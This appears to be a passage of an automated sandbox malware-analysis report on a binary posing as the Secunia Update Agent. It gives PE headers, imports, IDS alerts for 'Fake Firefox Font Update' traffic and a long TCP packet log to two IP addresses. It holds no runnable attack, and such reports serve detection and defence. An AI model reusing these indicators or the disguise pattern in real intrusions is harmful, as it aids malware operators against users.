call 00007F7BB8E6E249h
mov dword ptr [esi], 00454AFCh
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7BB8E6E26Eh
mov dword ptr [esi], 00454B08h
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F7BB8E6E212h
mov dword ptr [esi], 00454B08h
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
and dword ptr [esi+04h], 00000000h
mov dword ptr [esi], 00454ADCh
mov byte ptr [esi+08h], 00000000h
push dword ptr [eax]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[RES] VS2012 UPD3 build 60610
[LNK] VS2012 UPD3 build 60610

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6483c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6b000	0x569d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2af50851	0x5b80
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0x5054	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x53420	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5d378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x53000	0x2f0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5187c	0x51a00	bb7c4d9fb89a18af6a4c9aee47cf61d2	False	0.48915163189127103	data	6.593386799035746	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x53000	0x129ac	0x12a00	0663d8eae2b9a2f6ed9c0d4e75064976	False	0.34937342701342283	data	4.547999205685637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x66000	0x4fd8	0x2800	41724d4283591fb538613a010741dec5	False	0.3037109375	COM executable for DOS	4.316748080837043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6b000	0x569d0	0x56a00	d689d38e6a30b38f0057eb258a89a794	False	0.12158132665945166	data	5.05378499819237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0x50000	0x50000	da15ed4745b76d9206bb6e06996c3b89	False	0.859625244140625	data	7.572843049425892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6b1f0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144	English	United States	0.09283368346302927
RT_ICON	0xad218	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.16344788832367207
RT_ICON	0xbda40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.35269709543568467
RT_ICON	0xbffe8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.48850844277673544
RT_ICON	0xc1090	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.7606382978723404
RT_GROUP_ICON	0xc14f8	0x4c	data	English	United States	0.7894736842105263
RT_VERSION	0xc1548	0x304	data	English	United States	0.4585492227979275
RT_MANIFEST	0xc1850	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	SetEndOfFile, MoveFileExW, SetFilePointerEx, WriteFile, CopyFileW, GetFileAttributesW, ReadFile, CreateFileW, GetFileSizeEx, DeleteFileW, WideCharToMultiByte, FormatMessageW, LCMapStringW, CreateProcessW, GetExitCodeProcess, WaitForMultipleObjects, SetLastError, ExpandEnvironmentStringsW, GetDriveTypeW, Sleep, ExitProcess, GetModuleHandleW, ResumeThread, GetStringTypeW, EncodePointer, DecodePointer, RaiseException, HeapDestroy, HeapReAlloc, HeapSize, IsDebuggerPresent, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, GetCommandLineW, FileTimeToLocalFileTime, FindFirstFileExW, FileTimeToSystemTime, SetConsoleCtrlHandler, CreateThread, ExitThread, LoadLibraryExW, RtlUnwind, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetDateFormatW, GetTimeFormatW, CompareStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetStdHandle, IsValidCodePage, GetACP, GetOEMCP, GetTimeZoneInformation, GetFileType, QueryPerformanceCounter, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetFileInformationByHandle, PeekNamedPipe, GetFullPathNameW, GetConsoleCP, GetConsoleMode, OutputDebugStringW, LoadLibraryW, SetStdHandle, ReadConsoleW, WriteConsoleW, FlushFileBuffers, SetEnvironmentVariableA, GetProcessHeap, HeapFree, GetCurrentProcess, HeapAlloc, GetCurrentProcessId, GetCurrentThreadId, GetLocalTime, GetVersionExW, GetComputerNameW, GetCurrentDirectoryW, GetModuleFileNameW, GetModuleHandleExW, EnterCriticalSection, LeaveCriticalSection, GetProcAddress, TerminateProcess, OpenProcess, DeleteCriticalSection, FindNextFileW, FindClose, SetEvent, WaitForSingleObject, FindFirstFileW, LocalFree, GetLastError, CloseHandle, CreateEventW, LockResource, MultiByteToWideChar, SizeofResource, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, LoadResource, FindResourceW, SetThreadPriority, FindResourceExW, SetConsoleMode
ADVAPI32.dll	ChangeServiceConfig2W, CloseServiceHandle, CreateServiceW, GetUserNameW, LsaFreeMemory, ConvertSidToStringSidW, AdjustTokenPrivileges, LsaNtStatusToWinError, LsaClose, GetSidSubAuthority, GetAclInformation, CopySid, GetSecurityDescriptorControl, EqualSid, GetAce, GetSecurityDescriptorLength, LookupAccountSidW, GetNamedSecurityInfoW, GetSecurityDescriptorOwner, IsValidSid, GetSidLengthRequired, InitializeSid, GetSecurityDescriptorSacl, MakeSelfRelativeSD, GetLengthSid, GetSecurityDescriptorGroup, GetSecurityDescriptorDacl, LookupPrivilegeValueW, QueryServiceConfigW, ControlService, OpenServiceW, DeleteService, RegSetValueExW, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegQueryInfoKeyW, RegQueryValueExW, RegCreateKeyExW, LookupAccountNameW, LsaAddAccountRights, GetTokenInformation, LsaEnumerateAccountRights, LsaOpenPolicy, OpenProcessToken, StartServiceW, QueryServiceStatus, StartServiceCtrlDispatcherW, RegisterServiceCtrlHandlerExW, SetServiceStatus, LogonUserW, ImpersonateLoggedOnUser, RevertToSelf, OpenSCManagerW
PSAPI.DLL	GetModuleFileNameExW, EnumProcesses
NETAPI32.dll	NetGetJoinInformation, NetUserGetLocalGroups, NetApiBufferFree
Secur32.dll	GetComputerObjectNameW, GetUserNameExW
USERENV.dll	UnloadUserProfile, LoadUserProfileW

Version Infos

Description	Data
CompanyName	Secunia
FileDescription	Secunia Update Agent
FileVersion	3.0.0.11005
InternalName	SUA.exe
LegalCopyright	(c) 2007-2015 Secunia. All rights reserved.
OriginalFilename	SUA.exe
ProductName	Secunia Update Agent
ProductVersion	3.0.0.11005
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-13T20:22:24.529121+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49703	89.169.54.153	443	TCP
2025-04-13T20:22:40.249736+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49692	104.21.48.1	443	TCP
2025-04-13T20:22:42.525120+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49693	104.21.48.1	443	TCP
2025-04-13T20:22:43.786036+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49694	104.21.48.1	443	TCP
2025-04-13T20:22:45.399384+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49695	104.21.48.1	443	TCP
2025-04-13T20:22:48.745228+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49698	104.21.48.1	443	TCP
2025-04-13T20:22:50.320351+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49700	104.21.48.1	443	TCP
2025-04-13T20:22:51.816990+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49701	104.21.48.1	443	TCP
2025-04-13T20:22:54.382305+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49702	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 13, 2025 20:22:40.024049997 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.024095058 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.024183035 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.025614977 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.025649071 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.249627113 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.249736071 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.254123926 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.254148960 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.254386902 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.303461075 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.303541899 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.303656101 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817823887 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817878962 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817908049 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817935944 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817964077 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.817992926 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818006039 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818018913 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818048000 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818064928 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818064928 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818089008 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818192005 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818236113 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818279028 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818279982 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818291903 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.818334103 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.818341017 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.871395111 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.946656942 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.946715117 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.946742058 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.946765900 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.946887970 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.946928978 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947165966 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947208881 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.947213888 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947227955 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947274923 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.947274923 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947287083 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.947335005 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.947344065 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948189020 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948218107 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948245049 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948247910 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.948267937 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948285103 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.948295116 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.948337078 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.948344946 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.949012041 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.949049950 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.949058056 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.949089050 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.949126005 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.952512980 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.952541113 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:40.952554941 CEST	49692	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:40.952562094 CEST	443	49692	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.265263081 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.265305996 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.265383959 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.265741110 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.265755892 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.524913073 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.525120020 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.526838064 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.526849985 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.527090073 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.528441906 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.528597116 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.528630018 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:42.528686047 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:42.528692007 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.207515955 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.207812071 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.208019972 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.208326101 CEST	49693	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.208340883 CEST	443	49693	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.517313004 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.517338991 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.517441034 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.517786980 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.517802954 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.785945892 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.786036015 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.787570000 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.787585020 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.788605928 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.790036917 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.790163994 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.790206909 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:43.790256977 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:43.836270094 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:44.413887024 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:44.414244890 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:44.414443970 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:44.418164968 CEST	49694	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:44.418188095 CEST	443	49694	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.131481886 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.131520033 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.131586075 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.131941080 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.131957054 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.399122000 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.399384022 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.401047945 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.401055098 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.401444912 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.402672052 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.402790070 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.402829885 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:45.402892113 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:45.402903080 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:46.013566971 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:46.013870955 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:46.013931990 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:46.018089056 CEST	49695	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:46.018106937 CEST	443	49695	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.494414091 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.494489908 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.494565964 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.494926929 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.494965076 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.745121002 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.745228052 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.746586084 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.746601105 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.746862888 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:48.748209953 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.748496056 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:48.748529911 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:49.420293093 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:49.420455933 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:49.420548916 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:49.432679892 CEST	49698	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:49.432693005 CEST	443	49698	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.084295988 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.084333897 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.084487915 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.084821939 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.084837914 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.320288897 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.320350885 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.322165966 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.322175980 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.322441101 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.323760033 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.323966026 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.323993921 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.919573069 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.919742107 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:50.919799089 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.919984102 CEST	49700	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:50.920002937 CEST	443	49700	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.564877987 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.564953089 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.565056086 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.565412998 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.565449953 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.816914082 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.816989899 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.818392992 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.818413973 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.818669081 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.822689056 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.823585987 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.823625088 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.823745012 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.823782921 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.823928118 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.823951006 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824104071 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824122906 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824285030 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824305058 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824454069 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824470043 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824476957 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824486971 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824636936 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824652910 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.824673891 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824800968 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.824834108 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.868313074 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.868530989 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.868575096 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.868619919 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.868657112 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:51.868726015 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:51.868753910 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:53.622581005 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:53.622711897 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:53.622870922 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:53.622963905 CEST	49701	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:53.622987032 CEST	443	49701	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:53.692637920 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:53.692702055 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:53.692794085 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:53.693231106 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:53.693244934 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.382163048 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.382304907 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.383842945 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.383853912 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.384129047 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.385364056 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.385385990 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.385440111 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.993678093 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.993748903 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.993817091 CEST	49702	443	192.168.2.5	104.21.48.1
